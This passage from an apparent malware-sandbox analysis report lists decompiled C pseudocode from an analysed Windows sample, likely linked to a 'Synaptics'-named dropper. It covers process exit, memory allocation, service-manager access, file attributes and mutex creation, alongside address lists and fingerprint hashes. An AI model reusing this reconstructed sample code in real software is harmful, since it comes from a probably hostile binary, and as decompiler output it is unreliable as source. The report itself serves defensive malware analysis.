						E0040459C();
						if( *((char*)(0x49e660)) == 1) {
							 *0x0049E65C();
						}
						if( *((char*)(0x49e660)) != 0) {
							E00404790();
						}
						if( *0x49e638 == 0) {
							if( *0x49e028 != 0) {
								 *0x49e028();
							}
							ExitProcess( *0x49b000); // executed
						}
						memcpy(0x49e638,  *0x49e638, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x49b000 = 0x49b000;
					}
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L3;
				}
			}







                                                    0x00404863
                                                    0x0040487b
                                                    0x00404882
                                                    0x00404884
                                                    0x00404889
                                                    0x00404890
                                                    0x00404890
                                                    0x00000000
                                                    0x00404895
                                                    0x00404899
                                                    0x004048a2
                                                    0x004048a2
                                                    0x004048a5
                                                    0x004048ae
                                                    0x004048b5
                                                    0x004048ba
                                                    0x004048bc
                                                    0x004048c1
                                                    0x004048c4
                                                    0x004048c4
                                                    0x004048c7
                                                    0x004048ca
                                                    0x004048d1
                                                    0x004048d1
                                                    0x004048ca
                                                    0x004048ba
                                                    0x004048d6
                                                    0x004048df
                                                    0x004048e1
                                                    0x004048e1
                                                    0x004048e8
                                                    0x004048ea
                                                    0x004048ea
                                                    0x004048f2
                                                    0x004048fb
                                                    0x004048fd
                                                    0x004048fd
                                                    0x00404906
                                                    0x00404906
                                                    0x00404917
                                                    0x00404917
                                                    0x00404919
                                                    0x00404919
                                                    0x0040486a
                                                    0x0040486a
                                                    0x00404870
                                                    0x00404874
                                                    0x00404876
                                                    0x00000000
                                                    0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction ID: 8f7f5b5083db65be3b92a9b52f1338e088dbfa5033c12c2e4b8cbee57b0dbfcd
                                                    • Opcode Fuzzy Hash: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction Fuzzy Hash: 88217CFA900285AFEB20AF66848475777D1AF89314F24897B9A04A72C6D77CCCD0C75D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404844 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00404844() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L5:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t36);
						 *0x49b004 = 0;
					}
					L7:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t17 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t17);
							_t39 =  *((intOrPtr*)(0x49e648));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x49b000 = 0x49b000;
					goto L7;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L5;
				}
			}








                                                    0x00404846
                                                    0x00404863
                                                    0x0040487b
                                                    0x00404882
                                                    0x00404884
                                                    0x00404889
                                                    0x00404890
                                                    0x00404890
                                                    0x00404895
                                                    0x00404899
                                                    0x004048a2
                                                    0x004048a2
                                                    0x004048a5
                                                    0x004048ae
                                                    0x004048b5
                                                    0x004048ba
                                                    0x004048bc
                                                    0x004048c1
                                                    0x004048c4
                                                    0x004048c4
                                                    0x004048c7
                                                    0x004048ca
                                                    0x004048d1
                                                    0x004048d1
                                                    0x004048ca
                                                    0x004048ba
                                                    0x004048d6
                                                    0x004048df
                                                    0x004048e1
                                                    0x004048e1
                                                    0x004048e8
                                                    0x004048ea
                                                    0x004048ea
                                                    0x004048f2
                                                    0x004048fb
                                                    0x004048fd
                                                    0x004048fd
                                                    0x00404906
                                                    0x00404906
                                                    0x00404917
                                                    0x00404917
                                                    0x00404919
                                                    0x00000000
                                                    0x0040486a
                                                    0x0040486a
                                                    0x00404870
                                                    0x00404874
                                                    0x00404876
                                                    0x00000000
                                                    0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction ID: 883b3613692aa30e866907f4332a392e5c305926fac8e5934d264d12186bf84f
                                                    • Opcode Fuzzy Hash: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction Fuzzy Hash: 4F218CF5900285AFEB21AF6684847563BE1AF95314F1488BBDA04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404848 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00404848() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L4:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t35);
						 *0x49b004 = 0;
					}
					L6:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t16 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t16);
							_t38 =  *((intOrPtr*)(0x49e648));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x49b000 = 0x49b000;
					goto L6;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L4;
				}
			}







                                                    0x00404863
                                                    0x0040487b
                                                    0x00404882
                                                    0x00404884
                                                    0x00404889
                                                    0x00404890
                                                    0x00404890
                                                    0x00404895
                                                    0x00404899
                                                    0x004048a2
                                                    0x004048a2
                                                    0x004048a5
                                                    0x004048ae
                                                    0x004048b5
                                                    0x004048ba
                                                    0x004048bc
                                                    0x004048c1
                                                    0x004048c4
                                                    0x004048c4
                                                    0x004048c7
                                                    0x004048ca
                                                    0x004048d1
                                                    0x004048d1
                                                    0x004048ca
                                                    0x004048ba
                                                    0x004048d6
                                                    0x004048df
                                                    0x004048e1
                                                    0x004048e1
                                                    0x004048e8
                                                    0x004048ea
                                                    0x004048ea
                                                    0x004048f2
                                                    0x004048fb
                                                    0x004048fd
                                                    0x004048fd
                                                    0x00404906
                                                    0x00404906
                                                    0x00404917
                                                    0x00404917
                                                    0x00404919
                                                    0x00000000
                                                    0x0040486a
                                                    0x0040486a
                                                    0x00404870
                                                    0x00404874
                                                    0x00404876
                                                    0x00000000
                                                    0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction ID: 9fe47824b19111ae0d82b188d774791a2e79eaf21524d9292fd64a79079edc68
                                                    • Opcode Fuzzy Hash: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction Fuzzy Hash: 87216DF5900285AFEB20AF66C48475677E1AF95314F14887B9A04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401748 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49e5ec; // 0x49e5ec
				while(_t29 != 0x49e5ec) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                    0x0040174f
                                                    0x00401753
                                                    0x0040175a
                                                    0x0040176f
                                                    0x00401777
                                                    0x0040177d
                                                    0x00401783
                                                    0x00401786
                                                    0x004017ca
                                                    0x0040178e
                                                    0x0040178e
                                                    0x00401791
                                                    0x00401794
                                                    0x00401798
                                                    0x0040179a
                                                    0x0040179a
                                                    0x004017a0
                                                    0x004017a2
                                                    0x004017a2
                                                    0x004017a8
                                                    0x004017b5
                                                    0x004017bc
                                                    0x004017be
                                                    0x004017c4
                                                    0x00000000
                                                    0x004017c4
                                                    0x004017bc
                                                    0x004017c8
                                                    0x004017c8
                                                    0x004017d9

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004017B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: I
                                                    • API String ID: 4275171209-1966777607
                                                    • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                    • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                    • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004738BC Relevance: 3.0, APIs: 2, Instructions: 38serviceCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E004738BC(char __eax, signed int __ebx) {
				char _v8;
				intOrPtr* _t11;
				void* _t14;
				intOrPtr _t25;
				intOrPtr _t28;

				_push(__ebx);
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t28);
				_push(0x473922);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				_t11 =  *0x49de34; // 0x49b0ec
				if( *_t11 == 2) {
					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
						CloseServiceHandle(_t14);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x473929);
				return E004049C0( &_v8);
			}








                                                    0x004738c0
                                                    0x004738c1
                                                    0x004738c7
                                                    0x004738ce
                                                    0x004738cf
                                                    0x004738d4
                                                    0x004738d7
                                                    0x004738da
                                                    0x004738e2
                                                    0x004738f8
                                                    0x00473904
                                                    0x00473907
                                                    0x00473907
                                                    0x00473904
                                                    0x0047390e
                                                    0x00473911
                                                    0x00473914
                                                    0x00473921

                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleManagerOpenService
                                                    • String ID:
                                                    • API String ID: 1199824460-0
                                                    • Opcode ID: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                    • Opcode Fuzzy Hash: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                    • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458384 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00458384(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x49befc;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x49e668; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0045843C(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                    0x00458388
                                                    0x00458396
                                                    0x00458399
                                                    0x0045839e
                                                    0x004583a3
                                                    0x004583a6
                                                    0x004583b0
                                                    0x004583ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004583b2
                                                    0x004583b2
                                                    0x004583b2
                                                    0x004583b2
                                                    0x004583c0
                                                    0x004583cb
                                                    0x004583d0
                                                    0x004583d1
                                                    0x004583d4
                                                    0x004583dd

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CursorLoad
                                                    • String ID:
                                                    • API String ID: 3238433803-0
                                                    • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                    • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409A90 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409A90(void* __eax, long __edx) {
				int _t4;
				long _t7;

				_t7 = 0;
				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
				if(_t4 == 0) {
					_t7 = GetLastError();
				}
				return _t7;
			}





                                                    0x00409a97
                                                    0x00409aa2
                                                    0x00409aa9
                                                    0x00409ab0
                                                    0x00409ab0
                                                    0x00409ab7

                                                    APIs
                                                    • SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                    • GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1799206407-0
                                                    • Opcode ID: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                    • Opcode Fuzzy Hash: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047423C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				intOrPtr _t25;
				void* _t27;
				void* _t30;

				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t30);
				_push(0x4742ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t30 + 0xfffffff8;
				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
				_t27 = _t13;
				if(GetLastError() != 0xb7) {
					if(_t27 != 0 && _v9 == 0) {
						CloseHandle(_t27);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x4742b3);
				return E004049C0( &_v8);
			}









                                                    0x00474244
                                                    0x00474247
                                                    0x0047424d
                                                    0x00474254
                                                    0x00474255
                                                    0x0047425a
                                                    0x0047425d
                                                    0x0047426f
                                                    0x00474274
                                                    0x00474280
                                                    0x00474288
                                                    0x00474291
                                                    0x00474291
                                                    0x00474288
                                                    0x00474298
                                                    0x0047429b
                                                    0x0047429e
                                                    0x004742ab

                                                    APIs
                                                      • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    • GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
                                                    • CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateErrorHandleLastMutex
                                                    • String ID:
                                                    • API String ID: 4294037311-0
                                                    • Opcode ID: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                    • Opcode Fuzzy Hash: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043C1FC Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x49dbcc; // 0x49ebb8
								E0045B21C( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403DE8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x49eb18; // 0x0
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x49eb18; // 0x0
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x49eb18; // 0x0
								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00451924( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403DE8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E004519E0(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E004519E0(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                                                    0x0043c208
                                                    0x0043c20a
                                                    0x0043c210
                                                    0x0043c248
                                                    0x0043c248
                                                    0x0043c24f
                                                    0x0043c288
                                                    0x0043c28a
                                                    0x0043c28f
                                                    0x0043c367
                                                    0x0043c367
                                                    0x0043c36c
                                                    0x0043c379
                                                    0x0043c379
                                                    0x0043c37e
                                                    0x00000000
                                                    0x0043c384
                                                    0x0043c295
                                                    0x0043c29a
                                                    0x00000000
                                                    0x00000000
                                                    0x0043c2a0
                                                    0x0043c2a4
                                                    0x0043c2ba
                                                    0x0043c2bc
                                                    0x0043c2bc
                                                    0x0043c2c1
                                                    0x0043c2ce
                                                    0x0043c2d0
                                                    0x0043c2d9
                                                    0x00000000
                                                    0x0043c2d9
                                                    0x0043c2c3
                                                    0x0043c2c3
                                                    0x0043c2c4
                                                    0x0043c2e3
